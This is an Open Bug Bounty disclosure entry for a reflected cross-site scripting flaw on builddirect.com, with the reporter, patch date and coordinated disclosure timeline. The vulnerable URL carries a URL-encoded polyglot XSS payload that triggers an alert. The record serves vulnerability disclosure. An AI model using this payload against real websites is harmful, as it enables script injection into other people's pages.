builddirect.com XSS vulnerability

2016-04-06T07:39:00
ID OBB:144968
Type openbugbounty
Reporter Spam404
Modified 2017-04-10T10:30:00

Description

Vulnerable URL:
https://www.builddirect.com/Result.aspx?N=0&Ntk;=Secondary&Ntt;=%2F*-%2F*%60%2F*\%60%2F*%27%2F*%22%2F**%2F%28%2F*%20*%2FoNcliCk%3Dalert%28%2FXSSPOSED%2F%29%20%29%2F%2F%250D%250A%250D%250A%2F%2F&Nty;=1&D;=%2F*-%2F*%60%2F*\%60%2F*%27%2F*%22%2F**%2F%28%2F*%20*%2FoNcliCk%3Dalert%28%2FXSSPOSED%2F%29%20%29%2F%2F%250D%250A%250D%250A%2F%2F&Ntx;=mode+matchallpartial&Dx;=mode+matchallpartial
Details:

Description| Value
---|---
Patched:| Yes, at 09.04.2017
Latest check for patch:| 09.04.2017 17:16 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 17279
Google Pagerank| 4
VIP website status:| Yes
Check builddirect.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 April, 2016 07:39 GMT
Generic security notifications sent to website owner| 6 April, 2016 07:41 GMT
Notification sent to subscribers (without technical details)| 6 April, 2016 10:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2016 08:11 GMT
Vulnerability patched by the website owner| 10 April, 2017 10:30 GMT